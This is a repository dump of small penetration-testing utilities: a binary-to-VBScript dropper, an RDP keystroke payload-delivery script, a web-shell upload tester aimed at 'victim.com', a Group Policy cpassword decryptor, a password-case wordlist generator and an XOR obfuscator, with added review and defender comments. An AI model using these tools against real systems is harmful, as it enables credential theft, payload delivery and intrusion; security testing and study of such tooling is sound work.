├── README.md
├── binary2vbs.py
├── count.py
├── file-upload
├── groupsxml.py
├── ip2binary.py
├── iter-case
├── lhistory
├── myip
├── rdp-cmd-delivery.sh
└── xor_key.py
/README.md:
--------------------------------------------------------------------------------
# mytools
Some simple and useful tools

file-upload : multipart form file upload python script (python)

lhistory: get history command output at n offset (bash)

myip: get your WAN ip address in command line (bash)

binary2vbs.py : used to drop binaries to target host via VBScript file

--------------------------------------------------------------------------------
/binary2vbs.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
#__author__ @nopernik
#
# Emit a VBScript file (on stdout) that recreates the given binary.
# The input file is hex-encoded and split into string chunks placed in a
# VBScript Array; the generated script decodes two hex chars at a time with
# Chr(CLng("&H" & ...)) and writes the bytes to "binary.bin.js" through
# Scripting.FileSystemObject.
#
# Python 2 only: `print` statements and str.encode('hex').
#
# Detection note (defender): a large Array of hex-string literals combined
# with a Chr(CLng("&H"...)) loop and CreateTextFile is a recognizable
# hex-blob-to-file pattern worth matching in script-content inspection.

import sys

# VBScript prologue: the byte-writer function and the opening of the Array
# literal. The Array elements (hex chunks) are printed between header and footer.
header = '''Function myWrite(data)
For i = 1 to Len(data) Step 2
myFile.Write Chr(CLng("&H" & Mid(data,i,2)))
Next
End Function

Dim myArray

myArray = Array( _'''

# VBScript epilogue: creates the output file and feeds every chunk to myWrite.
# The output name "binary.bin.js" is hard-coded inside the generated script.
footer = '''
Dim fObject
Set fObject = CreateObject("Scripting.FileSystemObject")
Dim myFile
Dim fileName
fileName = "binary.bin.js"
Set myFile = fObject.CreateTextFile(fileName, true , false)

For each i in myArray
myWrite(i)
Next

myFile.Close
'''

if not len(sys.argv[1:]):
    print 'Usage: binary2vbs file'
    exit()

f = open(sys.argv[1],'rb')
infile = f.read()
f.close()

# Whole file as one hex string (two hex chars per input byte).
line = infile.encode('hex')

# Choose the chunk width n: the first even width in [200, 298] that does NOT
# evenly divide the hex length. That guarantees the final chunk is strictly
# shorter than n, which the loop below relies on to emit the closing `")`.
# NOTE(review): if every width divides len(line) evenly (unlikely, but
# possible), n is never bound and the chunk loop raises NameError.
for i in range(200,300,2):
    if len(line) % i != 0:
        n = i
        break

print header

# Full-width chunks are Array elements with a line continuation; the single
# short trailing chunk closes the Array literal.
for b in [line[i:i+n] for i in range(0, len(line), n)]:
    if not len(b) < n:
        print '"%s", _' % b
    else:
        print '"%s")' % b

print footer

--------------------------------------------------------------------------------
/count.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Report every byte offset at which STRING occurs in FILE.
#   --hex    interpret STRING as hex (e.g. 4d5a) instead of raw characters
#   --print  also show 8 bytes of context on each side, match highlighted green
# Python 2 only: `print` statements and str.encode/decode('hex').
import sys,re

W = '\033[0m' # white (normal)
G = '\033[32m' # green

if not len(sys.argv[2:]):
    print 'Usage: count.py STRING FILE [--hex] [--print]'
    exit(1)

# The whole file is read into memory as a byte string.
with open(sys.argv[2],'rb') as fin:
    f = fin.read()

def FindOffsets(target, match):
    """Return the start offsets of every occurrence of `match` in `target`.

    The pattern is wrapped in a zero-width lookahead, so overlapping
    occurrences are all reported (e.g. 'aa' in 'aaa' -> [0, 1]).
    `re.escape` keeps regex metacharacters in `match` literal.
    """
    #print 'Regex find: %r in %r' % (match,target)
    return [m.start() for m in re.finditer('(?={})'.format(re.escape(match)), target)]

prn = False
if '--print' in sys.argv:
    prn = True

hexa = False
if '--hex' in sys.argv:
    hexa = True

if hexa:
    match = sys.argv[1].decode('hex')
else:
    match = sys.argv[1]

offsets = FindOffsets(f,match)
for offset in offsets:
    out = 'Found'
    if prn:
        # NOTE(review): for offsets < 8, `offset-8` is negative and Python
        # slices from the END of the buffer, so the left context is wrong
        # (usually empty) for matches within the first 8 bytes.
        if hexa:
            out = f[offset-8:offset].encode('hex')+G+f[offset:offset+len(match)].encode('hex')+W+f[offset+len(match):offset+len(match)+8].encode('hex')
        else:
            out = f[offset-8:offset]+G+f[offset:offset+len(match)]+W+f[offset+len(match):offset+len(match)+8]
        print '0x%08x: %s' % (offset,out)
    else:
        print '0x%08x' % offset

--------------------------------------------------------------------------------
/file-upload:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Send one file as a multipart/form-data POST to a URL, for testing upload
# handlers. Options are parsed by hand from sys.argv (see usage()).
# Python 2 only (`print` statements). Requires the third-party `requests`.
import os
import requests
import sys

# Defaults
content_type = 'application/octet-stream'
upload_file = 'test.php'      # multipart filename when -f is not given
upload_content = ''           # empty body when -f is not given
variable = 'file'             # form field name carrying the file

def usage(fault=0):
    """Print usage and exit; `fault` names the option that was missing/bad."""

    print '''
Usage: upload.py [-u][-f][--content-type][--variable][--origin]

-u http://victim.com/upload.php
-f shell.php (this file will be uploaded)
--content-type image/png
--variable myfile (variable of file form parameter)
--origin http://victim.com/index.php

if -f not specified, it will upload '' to test.php
'''
    if fault:
        print 'Error with %s parameter...' % fault
    exit()

if not len(sys.argv[1:]): usage()

params = sys.argv[1:]

def opt(v):
    """Return the argument following option `v`.

    NOTE(review): raises IndexError (not a usage message) when `v` is the
    last token on the command line.
    """
    return params[params.index(v)+1]

# usage() exits, so `url` is always bound after this block.
if '-u' in params:
    url = opt('-u')
else:
    usage('-u')

if '-f' in params:
    if os.path.isfile(opt('-f')):
        f = open(opt('-f'),'rb')
        upload_content = f.read()
        # The local path string as typed is used verbatim as the multipart
        # filename (no basename() applied).
        upload_file = opt('-f')
        f.close()
    else:
        usage('-f')

if '--content-type' in params:
    content_type = opt('--content-type')

# Origin header defaults to the target URL itself.
if '--origin' in params:
    origin = opt('--origin')
else:
    origin = opt('-u')

if '--variable' in params:
    variable = opt('--variable')

session = requests.Session()

paramsPost = {"submit":"submit"}
paramsMultipart = [(variable, (upload_file, upload_content, content_type))]
# Fixed browser-like header set; only Origin varies.
headers = {"Origin":origin,"Cache-Control":"max-age=0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","User-Agent":"Mozilla/5.0 (X11; Linux x86) AppleWebKit/524.12 (KHTML, like Gecko) Chrome/52.0.2963.251 Safari/524.12","Connection":"close","Accept-Encoding":"gzip, deflate","Accept-Language":"en-US,en;q=0.8"}
response = session.post(url, data=paramsPost, files=paramsMultipart, headers=headers)

# Only the status code is reported; the response body is discarded.
print "Status code:", response.status_code
print
--------------------------------------------------------------------------------
/groupsxml.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Parse Group Policy Preferences Groups.xml files and print the user entries,
# decrypting any `cpassword` attribute with the vendor-published AES key
# (link in decryptPass). Useful for auditing SYSVOL for leftover credentials.
#   -p CPASSWORD   decrypt a single value
#   -f Groups.xml  parse one file
#   -d DIR         parse every *.xml-named file in DIR
#   -v | -vv       print more attributes per user
# Python 2 only; requires third-party xmltodict and PyCrypto (Crypto.Cipher).

import xmltodict
import sys, os, re, json
from Crypto.Cipher import AES
from base64 import b64decode
from pprint import pprint

# Verbosity flags. Note the elif: when both -v and -vv are given, only
# `verbose` is set.
verbose = False
verbose2 = False
if '-v' in sys.argv:
    verbose = True
elif '-vv' in sys.argv:
    verbose2 = True

if not len(sys.argv[2:]):
    print "Usage: groupsxml.py [-p ][-f Groups.xml][-d path-to-xml-files] [-v|-vv]"
    sys.exit(1)

def decryptPass(cpassword):
    """Decrypt a GPP `cpassword` value and return it as a unicode string.

    The value is base64 (possibly missing '=' padding), AES-256-CBC with a
    zero IV, and the plaintext is UTF-16 with trailing pad bytes.
    """
    # Init the key
    # From MSDN: http://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be%28v=PROT.13%29#endNote2
    key = """
4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8
f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b
""".replace(" ","").replace("\n","").decode('hex')

    # Add padding to the base64 string and decode it
    # NOTE(review): the pad length is computed from len(sys.argv[1]), not
    # from len(cpassword). That only coincides in `-p` mode, where argv[1]
    # is '-p'... i.e. it does not coincide at all; in -f/-d mode argv[1] is
    # the option flag. Expect b64decode padding errors for some inputs.
    cpassword += "=" * ((4 - len(sys.argv[1]) % 4) % 4)
    password = b64decode(cpassword)

    # Decrypt the password
    o = AES.new(key, AES.MODE_CBC, "\x00" * 16).decrypt(password)

    # Strip PKCS#7-style padding using the last byte as the pad length, then
    # decode UTF-16. A corrupted last byte silently truncates the result.
    return o[:-ord(o[-1])].decode('utf16')

def parseUser(user):
    """Print the selected attributes of one <User> element (a dict).

    Only users whose Properties carry a non-empty @cpassword are printed.
    NOTE(review): the bare `except: pass` also hides a KeyError when
    'Properties' or '@cpassword' is absent, so such users are skipped
    silently rather than reported.
    """
    try:

        keys = [('Username','@userName'),('Password','@cpassword'),('New username','@newName')]
        if verbose: keys = [('Username','@userName'),('Password','@cpassword'),('New username','@newName'),('Description','@description'),('Disabled','@acctDisabled'),('No change','@noChange')]
        if verbose2: keys = [('Username','@userName'),('Password','@cpassword'),('New username','@newName'),('Action','@action'),('Full Name','@fullName'),('Description','@description'),('Disabled','@acctDisabled'),('Never Expires','@neverExpires'),('No change','@noChange')]
        prop = user['Properties']
        if prop['@cpassword']:
            #print '\n'
            print 'Change date: %s' % user['@changed']
            for label,k in keys:
                if k in prop:
                    # The cpassword column is shown decrypted; everything else raw.
                    print '%s: %s' % (label,decryptPass(prop[k]) if k == '@cpassword' and prop[k] else prop[k])
            print
    except:
        pass



def parseXml(DATA):
    """Parse a Groups.xml document (string) and print its <User> entries."""
    try:
        # Round-trip through JSON — presumably to turn xmltodict's ordered
        # mappings into plain dicts/lists; verify before relying on it.
        c = json.loads(json.dumps(xmltodict.parse(DATA)))
        if 'User' in c['Groups']:
            user = c['Groups']['User']
            # xmltodict yields a dict for a single <User> and a list for several.
            if isinstance(user,list):
                for i in user:
                    parseUser(i)
            elif isinstance(user,dict):
                parseUser(user)
        else:
            print '\nNo passwords found\n'

    except:
        print 'Something went wrong...'
        print sys.exc_info()

if '-p' in sys.argv:
    pwd = sys.argv[sys.argv.index('-p')+1]
    print decryptPass(pwd)

elif '-f' in sys.argv:
    infile = sys.argv[sys.argv.index('-f')+1]
    with open(infile) as f:
        parseXml(f.read())
elif '-d' in sys.argv:
    # NOTE(review): os.listdir returns bare names; open(infile) below does not
    # join them with the directory, so this only works when DIR is the cwd.
    # The filter is a substring test, so e.g. 'x.xml.bak' is included too.
    for infile in [i for i in os.listdir(sys.argv[sys.argv.index('-d')+1]) if '.xml' in i.lower()]:
        with open(infile) as f:
            parseXml(f.read())


#print '-'*30


--------------------------------------------------------------------------------
/ip2binary.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Print an IPv4/IPv6 address as an integer in bases 2, 8, 10 and 16.
# Python 2 only; requires the third-party `netaddr`.

import sys
from netaddr import IPAddress as IP
if not len(sys.argv[1:]):
    print '\nUsage ip2binary.py 8.8.8.8'
    exit()


# IPAddress.value is the address as a plain integer; any parse error is
# reported generically and the script exits.
try:
    ip = IP(sys.argv[1])
    ip = ip.value
except:
    print 'Error with ip value'
    exit()

print
print 'IP:',IP(ip)
print 'Base2:', bin(ip)
print 'Base8:', oct(ip)
print 'Base10', ip
print 'Base16:', hex(ip)
print
--------------------------------------------------------------------------------
/iter-case:
--------------------------------------------------------------------------------
#!/usr/bin/python
#__author__ Alexander Korznikov
#__date__ 11/11/2015
#__version__ 1.0
#
# Expand each input word into every case variant (and, with -l, every
# digit/symbol substitution from chars_dict) and print the variants, one per
# line. Input comes from -f FILE, -p WORD or -i (stdin). Python 2 only.

import sys
import itertools
import string

# NOTE(review): `qu` is defined but never referenced below.
qu = string.ascii_letters + string.digits + string.punctuation
# Substitution table; keys are lowercase only (see do_magic for the effect).
chars_dict = { 'a':['4','@'],'e':['3'],'l':['1'],'i':['1'],'s':['5','$'],'t':['7'],'b':['8'],'o':['0'],'g':['9'] }
infile = False   # True when iter_list is an open file that must be closed
l33t = False     # True: substitutions only, no case flipping

def usage():
    """Print the help text and exit."""
    print '''
\tGenerate whole spectrum of possible cases of p4$sw0rDs:

\tExamples:
\t 1. -i Pass strings via stdin:

\t # echo 'foo' | iter-case -i

\t 2. -p Pass string via argument:

\t # iter-case -p foo

\t 3. -f Pass in file argument:

\t # iter-case -f dict.txt

\t 4. -l 31337 aka skiddies method:
\t switch between 'e' -> '3' etc..

\t # iter-case [-f|-p|-i] -l

\t// Alexander Korznikov, Ver. 1.0 11/2015
'''
    # print '\n\tUsage: cat dict.txt | iter-case-stdin -i'
    # print '\tWill generate wordlist Passw0rd...pASSW0RD\n'
    exit()

def do_magic(iter_list):
    """Print every variant of every line in `iter_list` (an iterable of str).

    For each character a string of alternatives is built, then
    itertools.product over those strings yields the variants. When `infile`
    is set, `iter_list` is closed at the end.
    """
    for line in iter_list:
        out = list(line.strip())
        cnt = 0
        for i in out:
            # Membership is tested on the original char, but the table only has
            # lowercase keys, so uppercase letters get no substitutions.
            if i in chars_dict.keys():
                leet = ''
                for c in chars_dict[i.lower()]:
                    leet += c
            else:
                leet = ''

            # Alternatives for position cnt: the char itself, its swapped
            # case (unless -l), then any substitution characters.
            if l33t:
                out[cnt] = i + leet
            else:
                out[cnt] = i + (i.swapcase() if i.isalpha() else i) + leet
            cnt+=1

        for i in itertools.product(*out):
            print ''.join(i).strip()
    if infile:
        iter_list.close()

args = sys.argv[1:]

if not args or '-h' in args:
    usage()

# Input selection: -f takes precedence over -p, which takes precedence over -i.
if '-f' in args:
    try:
        iter_list = open(args[args.index('-f')+1])
        infile = True
    except:
        usage()

elif '-p' in args:
    iter_list = [args[args.index('-p')+1]]

elif '-i' in args:
    iter_list = sys.stdin

else:
    usage()

if '-l' in args:
    l33t = True

# Let's do the magic! ;)
do_magic(iter_list)

--------------------------------------------------------------------------------
/lhistory:
--------------------------------------------------------------------------------
#!/bin/bash
# Print the 41 history lines around line number $1 of $HISTFILE
# (offset-20 .. offset+20).
#
# NOTE(review): $1 is not validated (expr errors on non-numeric input and a
# negative start makes sed fail), and HISTFILE is normally only set in
# interactive shells; when it is empty the unquoted expansion vanishes and
# sed reads from stdin instead.

offset=$1

o1=`expr $offset - 20`
o2=`expr $offset + 20`

sed -n "$o1","$o2"p $HISTFILE
--------------------------------------------------------------------------------
/myip:
--------------------------------------------------------------------------------
#!/bin/bash
#
# by @nopernik @korznikov.com
#
# Show local 'scope global' addresses (vmnet interfaces excluded), then the
# public address as seen by OpenDNS (DNS query to resolver1.opendns.com, so
# the lookup itself goes to a third party), followed by a whois summary.
#
# NOTE(review): bldpur, txtblu and bldblu are defined but unused.
bldpur='\e[1;35m'
txtblu='\e[0;34m'
bldblu='\e[1;34m'
bldgrn='\e[1;32m'
txtrst='\e[0m'
echo
echo -e "Local:\t" `ip a|grep 'scope global' |grep -v vmnet |grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}/[0-9]{1,2}'`
echo
myip=`dig a myip.opendns.com @resolver1.opendns.com +short`
whois $myip | grep -Ei 'inetnum|netrange|cidr|netname|descr|organization|orgname|country'
echo
echo -e "------=| $bldgrn $myip $txtrst |=------"
echo

--------------------------------------------------------------------------------
/rdp-cmd-delivery.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# by @nopernik
#
# dependency xdotool
#
# Types the contents of a local file into the window named $WINDOWNAME via
# xdotool, i.e. the text arrives on the remote side as keyboard input.
#   --cmdfile FILE        type FILE line-for-line followed by Return
#   --tofile REMOTE FILE  type `copy con REMOTE`, the contents, then Ctrl+Z
#
# Detection note (defender): the remote side sees only keystrokes; file
# creation through `copy con` and the typed commands show up in console /
# command-line auditing rather than in any file-transfer channel.

WINDOWNAME=rdesktop

# NOTE(review): $1 is unquoted. With an empty $1 this becomes `[ -z ]`, which
# happens to be true, but an argument containing spaces breaks the test.
if [ -z $1 ]; then
    echo -e "\nUsage: rdp-cmd-delivery.sh OPTIONS file.ps1\n"
    echo -e " OPTIONS:"
    echo " --tofile 'c:\test.txt' local.ps1 #will copy contents of local.ps1 to c:\test.txt"
    echo " --cmdfile local.bat #will execute everything from local.bat"
    echo
    echo -e " To deliver powershell payload, use '--cmdfile script.ps1' but inside powershell console\n"
    exit 1
fi

function catFile {
    # $1 localfile content
    # Types $1 into the target window, then presses Return.
    xdotool search --name $WINDOWNAME windowfocus windowactivate type "$1"
    xdotool search --name $WINDOWNAME windowfocus windowactivate key Return
}

function copyCon {
    # $1 = filename to create remotely
    # $2 = file content
    # `copy con` reads console input until Ctrl+Z, so the content is typed
    # in between and terminated with Ctrl+Z Return.
    xdotool search --name $WINDOWNAME windowfocus windowactivate type "copy con $1"
    xdotool search --name $WINDOWNAME windowfocus windowactivate key Return
    xdotool search --name $WINDOWNAME windowfocus windowactivate type "$2"
    xdotool search --name $WINDOWNAME windowfocus windowactivate key Ctrl+Z Return
}

# NOTE(review): `cat $2` / `cat $3` are unquoted, so paths with spaces or glob
# characters are word-split / expanded.
if [ "$1" = "--cmdfile" ]; then
    catFile "$(cat $2)"
    exit 0
fi

# --tofile silently exits 0 without doing anything when the local FILE ($3)
# argument is missing.
if [ "$1" = "--tofile" ]; then
    if [ ! -z "$3" ];then
        copyCon "$2" "$(cat $3)"
    fi
    exit 0
fi
--------------------------------------------------------------------------------
/xor_key.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Repeating-key XOR of an input (raw file, hex file, string, or hex string)
# with a key (string or hex); output raw, hex (--hex) or to a file (--outfile).
# This is obfuscation, not confidentiality: a repeating key leaks by
# frequency analysis. Python 2 only (str.encode/decode('hex'), `print`).

import sys
import string

outfile = False
hex_out = False
if not len(sys.argv[2:]):
    print """Usage:\t xor.py
Input: --rawfile | --hexfile | --string STRING | --inhex 50415353574F5244
Key: --key PASSWORD | --keyhex 50415353574F5244
Output: --hex | --outfile
"""
    exit()
# NOTE(review): the name `string` is rebound here and shadows the imported
# `string` module for the rest of the script (the module is never used).
if '--string' in sys.argv:
    string = sys.argv[sys.argv.index('--string')+1]
elif '--inhex' in sys.argv:
    string = sys.argv[sys.argv.index('--inhex')+1].decode('hex')
elif '--rawfile' in sys.argv:
    # File handle is not closed explicitly (no `with`).
    string = open(sys.argv[sys.argv.index('--rawfile')+1],'rb').read()
elif '--hexfile' in sys.argv:
    # Whitespace/newlines are stripped before hex-decoding.
    string = open(sys.argv[sys.argv.index('--hexfile')+1],'rb').read().replace('\n','').replace('\r','').replace(' ','').decode('hex')
else:
    print 'Missing input parameters...'
    exit()
if '--keyhex' in sys.argv[2:]:
    key = sys.argv[sys.argv.index('--keyhex')+1].decode('hex')
elif '--key' in sys.argv:
    key = sys.argv[sys.argv.index('--key')+1]
else:
    print 'Missing xor key...'
    exit()
# --hex takes precedence over --outfile when both are given.
if '--hex' in sys.argv:
    hex_out = True
elif '--outfile' in sys.argv:
    outfile = sys.argv[sys.argv.index('--outfile')+1]

#string = '''Burning 'em, if you ain't quick and nimble
#I go crazy when I hear a cymbal'''

# XOR each input byte with the key byte at the cycling index cnt.
# NOTE(review): an empty key raises IndexError on key[0].
cipher = []
cnt = 0
for c in string:
    cipher.append(chr(ord(c) ^ ord(key[cnt])))
    cnt += 1
    if cnt == len(key):
        cnt = 0

enc = ''.join(cipher)

if hex_out:
    print enc.encode('hex')
elif outfile:
    with open(outfile,'wb') as f:
        f.write(enc)
else:
    print enc
--------------------------------------------------------------------------------